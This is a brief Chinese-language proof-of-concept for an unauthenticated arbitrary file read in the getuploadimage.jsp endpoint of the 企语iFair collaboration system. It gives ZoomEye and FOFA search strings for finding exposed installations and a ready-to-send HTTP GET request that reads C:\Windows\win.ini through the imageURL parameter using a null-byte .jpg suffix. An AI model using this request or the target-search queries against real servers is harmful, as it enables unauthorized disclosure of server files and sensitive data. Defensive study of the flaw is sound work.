企语iFair协同管理系统getuploadimage.jsp任意文件读取漏洞
一、漏洞描述
企语iFair协同管理系统getuploadimage.jsp接口处存在任意文件读取漏洞,未经身份认证的攻击者可以通过此漏洞获取服务器敏感信息,使系统处于极不安全状态。
二、影响版本
企语iFair协同管理系统
三、资产测绘
zoomeye:app:"企语 iFair"
fofa:app="服务社-企语iFair"
特征:
四、漏洞复现
GET /oa/common/components/upload/getuploadimage.jsp?imageURL=C:\Windows\win.ini%00.jpg HTTP/1.1
Host: xxxx
Accept-Encoding: gzip, deflate
